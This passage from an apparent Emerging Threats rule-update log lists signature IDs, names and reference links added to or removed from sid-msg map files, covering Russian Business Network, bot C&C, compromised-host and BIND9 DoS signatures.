2407759 || ET RBN Known Russian Business Network IP UDP - BLOCKING (380) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407760 || ET RBN Known Russian Business Network IP TCP - BLOCKING (381) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407761 || ET RBN Known Russian Business Network IP UDP - BLOCKING (381) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407762 || ET RBN Known Russian Business Network IP TCP - BLOCKING (382) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407763 || ET RBN Known Russian Business Network IP UDP - BLOCKING (382) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407764 || ET RBN Known Russian Business Network IP TCP - BLOCKING (383) || 
url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407765 || ET RBN Known Russian Business Network IP UDP - BLOCKING (383) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407766 || ET RBN Known Russian Business Network IP TCP - BLOCKING (384) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407767 || ET RBN Known Russian Business Network IP UDP - BLOCKING (384) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407768 || ET RBN Known Russian Business Network IP TCP - BLOCKING (385) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407769 || ET RBN Known Russian Business Network IP UDP - BLOCKING (385) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407770 || ET RBN Known Russian Business Network IP TCP - BLOCKING (386) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407771 || ET RBN Known Russian Business Network IP UDP - BLOCKING (386) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407772 || ET RBN Known Russian Business Network IP TCP - BLOCKING (387) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407773 || ET RBN Known Russian Business Network IP UDP - BLOCKING (387) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407774 || ET RBN Known Russian Business Network IP TCP - BLOCKING (388) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407775 || ET RBN Known Russian Business Network IP UDP - BLOCKING (388) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork -> Added to emerging-sid-msg.map.txt (94): 2404025 || ET DROP Known Bot C&C Server Traffic (group 26) || url,www.shadowserver.org 2405025 || ET DROP Known Bot C&C Traffic (group 26) - BLOCKING SOURCE || url,www.shadowserver.org 2406730 || ET RBN Known Russian Business Network IP TCP (366) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406731 || ET RBN Known 
Russian Business Network IP UDP (366) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406732 || ET RBN Known Russian Business Network IP TCP (367) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406733 || ET RBN Known Russian Business Network IP UDP (367) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406734 || ET RBN Known Russian Business Network IP TCP (368) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406735 || ET RBN Known Russian Business Network IP UDP (368) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406736 || ET RBN Known Russian Business Network IP TCP (369) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406737 || ET RBN Known Russian Business Network IP UDP (369) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406738 || ET RBN Known Russian Business Network IP TCP (370) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406739 || ET RBN Known Russian Business Network IP UDP (370) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406740 || ET RBN Known Russian Business Network IP TCP (371) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406741 || ET RBN Known Russian Business Network IP UDP (371) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406742 || ET RBN Known Russian Business Network IP TCP (372) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406743 || ET RBN Known Russian Business Network IP UDP (372) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406744 || ET RBN Known Russian Business Network IP TCP (373) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406745 || ET RBN Known Russian Business Network IP UDP (373) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406746 || ET RBN Known Russian Business Network IP TCP (374) || 
url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406747 || ET RBN Known Russian Business Network IP UDP (374) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406748 || ET RBN Known Russian Business Network IP TCP (375) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406749 || ET RBN Known Russian Business Network IP UDP (375) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406750 || ET RBN Known Russian Business Network IP TCP (376) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406751 || ET RBN Known Russian Business Network IP UDP (376) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406752 || ET RBN Known Russian Business Network IP TCP (377) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406753 || ET RBN Known Russian Business Network IP UDP (377) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406754 || ET RBN Known Russian Business Network IP TCP (378) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406755 || ET RBN Known Russian Business Network IP UDP (378) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406756 || ET RBN Known Russian Business Network IP TCP (379) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406757 || ET RBN Known Russian Business Network IP UDP (379) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406758 || ET RBN Known Russian Business Network IP TCP (380) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406759 || ET RBN Known Russian Business Network IP UDP (380) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406760 || ET RBN Known Russian Business Network IP TCP (381) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406761 || ET RBN Known Russian Business Network IP UDP (381) || 
url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406762 || ET RBN Known Russian Business Network IP TCP (382) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406763 || ET RBN Known Russian Business Network IP UDP (382) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406764 || ET RBN Known Russian Business Network IP TCP (383) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406765 || ET RBN Known Russian Business Network IP UDP (383) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406766 || ET RBN Known Russian Business Network IP TCP (384) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406767 || ET RBN Known Russian Business Network IP UDP (384) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406768 || ET RBN Known Russian Business Network IP TCP (385) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406769 || ET RBN Known Russian Business Network IP UDP (385) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406770 || ET RBN Known Russian Business Network IP TCP (386) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406771 || ET RBN Known Russian Business Network IP UDP (386) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406772 || ET RBN Known Russian Business Network IP TCP (387) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406773 || ET RBN Known Russian Business Network IP UDP (387) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406774 || ET RBN Known Russian Business Network IP TCP (388) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2406775 || ET RBN Known Russian Business Network IP UDP (388) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407730 || ET RBN Known Russian Business Network IP TCP - BLOCKING (366) || 
url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407731 || ET RBN Known Russian Business Network IP UDP - BLOCKING (366) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407732 || ET RBN Known Russian Business Network IP TCP - BLOCKING (367) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407733 || ET RBN Known Russian Business Network IP UDP - BLOCKING (367) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407734 || ET RBN Known Russian Business Network IP TCP - BLOCKING (368) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407735 || ET RBN Known Russian Business Network IP UDP - BLOCKING (368) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407736 || ET RBN Known Russian Business Network IP TCP - BLOCKING (369) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407737 || ET RBN Known Russian Business Network IP UDP - BLOCKING (369) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407738 || ET RBN Known Russian Business Network IP TCP - BLOCKING (370) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407739 || ET RBN Known Russian Business Network IP UDP - BLOCKING (370) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407740 || ET RBN Known Russian Business Network IP TCP - BLOCKING (371) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407741 || ET RBN Known Russian Business Network IP UDP - BLOCKING (371) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407742 || ET RBN Known Russian Business Network IP TCP - BLOCKING (372) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407743 || ET RBN Known Russian Business Network IP UDP - BLOCKING (372) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407744 || ET RBN Known Russian Business Network IP TCP - BLOCKING (373) || 
url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407745 || ET RBN Known Russian Business Network IP UDP - BLOCKING (373) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407746 || ET RBN Known Russian Business Network IP TCP - BLOCKING (374) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407747 || ET RBN Known Russian Business Network IP UDP - BLOCKING (374) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407748 || ET RBN Known Russian Business Network IP TCP - BLOCKING (375) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407749 || ET RBN Known Russian Business Network IP UDP - BLOCKING (375) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407750 || ET RBN Known Russian Business Network IP TCP - BLOCKING (376) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407751 || ET RBN Known Russian Business Network IP UDP - BLOCKING (376) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407752 || ET RBN Known Russian Business Network IP TCP - BLOCKING (377) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407753 || ET RBN Known Russian Business Network IP UDP - BLOCKING (377) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407754 || ET RBN Known Russian Business Network IP TCP - BLOCKING (378) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407755 || ET RBN Known Russian Business Network IP UDP - BLOCKING (378) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407756 || ET RBN Known Russian Business Network IP TCP - BLOCKING (379) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407757 || ET RBN Known Russian Business Network IP UDP - BLOCKING (379) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407758 || ET RBN Known Russian Business Network IP TCP - BLOCKING (380) || 
url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407759 || ET RBN Known Russian Business Network IP UDP - BLOCKING (380) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407760 || ET RBN Known Russian Business Network IP TCP - BLOCKING (381) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407761 || ET RBN Known Russian Business Network IP UDP - BLOCKING (381) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407762 || ET RBN Known Russian Business Network IP TCP - BLOCKING (382) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407763 || ET RBN Known Russian Business Network IP UDP - BLOCKING (382) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407764 || ET RBN Known Russian Business Network IP TCP - BLOCKING (383) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407765 || ET RBN Known Russian Business Network IP UDP - BLOCKING (383) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407766 || ET RBN Known Russian Business Network IP TCP - BLOCKING (384) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407767 || ET RBN Known Russian Business Network IP UDP - BLOCKING (384) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407768 || ET RBN Known Russian Business Network IP TCP - BLOCKING (385) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407769 || ET RBN Known Russian Business Network IP UDP - BLOCKING (385) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407770 || ET RBN Known Russian Business Network IP TCP - BLOCKING (386) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407771 || ET RBN Known Russian Business Network IP UDP - BLOCKING (386) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407772 || ET RBN Known Russian Business Network IP TCP - BLOCKING (387) || 
url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407773 || ET RBN Known Russian Business Network IP UDP - BLOCKING (387) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407774 || ET RBN Known Russian Business Network IP TCP - BLOCKING (388) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork 2407775 || ET RBN Known Russian Business Network IP UDP - BLOCKING (388) || url,doc.emergingthreats.net/bin/view/Main/RussianBusinessNetwork [---] Removed non-rule lines: [---] -> Removed from emerging-rbn-BLOCK.rules (2): # VERSION 140 # Updated 2009-07-02 16:36:24 -> Removed from emerging-rbn.rules (2): # VERSION 140 # Updated 2009-07-02 16:36:24 -> Removed from emerging-sid-msg.map (77): 2009695 || ET CURRENT_EVENTS ISC BIND9 Update DoS || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Bind || url,doc.emergingthreats.net/2009695 || url,www.isc.org/node/474 || url,downloads.securityfocus.com/vulnerabilities/exploits/35848.txt 2500220 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500221 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500222 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500223 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500224 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500225 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500226 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500227 
|| ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500228 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500229 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500230 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500231 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500232 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500233 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500234 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500235 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500236 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500237 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500238 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500239 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500240 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500241 || ET COMPROMISED Known Compromised or 
Hostile Host Traffic UDP (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500242 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500243 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500244 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500245 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500246 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500247 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500248 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500249 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500250 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500251 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500252 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500253 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500254 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500255 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (128) || 
url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500256 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500257 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510220 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510221 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510222 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510223 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510224 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510225 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510226 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510227 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510228 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510229 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2510230 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 
        2510231 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510232 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510233 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510234 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510235 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510236 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510237 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510238 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510239 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510240 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510241 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510242 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510243 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510244 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510245 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (123) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510246 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510247 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (124) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510248 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510249 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (125) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510250 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510251 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (126) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510252 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510253 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (127) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510254 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510255 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (128) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510256 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP - BLOCKING (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2510257 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP - BLOCKING (129) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts

     -> Removed from emerging-sid-msg.map.txt (77):
        2009695 || ET CURRENT_EVENTS ISC BIND9 Update DoS || url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Bind || url,doc.emergingthreats.net/2009695 || url,www.isc.org/node/474 || url,downloads.securityfocus.com/vulnerabilities/exploits/35848.txt
        2500220 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500221 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (111) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500222 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500223 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (112) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500224 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500225 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (113) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500226 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500227 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (114) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500228 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500229 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (115) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500230 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts
        2500231 || ET COMPROMISED Known Compromised or Hostile Host
Traffic UDP (116) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500232 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500233 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (117) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500234 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500235 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (118) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500236 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500237 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (119) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500238 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500239 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (120) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500240 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500241 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (121) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500242 || ET COMPROMISED Known Compromised or Hostile Host Traffic TCP (122) || url,doc.emergingthreats.net/bin/view/Main/CompromisedHosts 2500243 || ET COMPROMISED Known Compromised or Hostile Host Traffic UDP (122) || 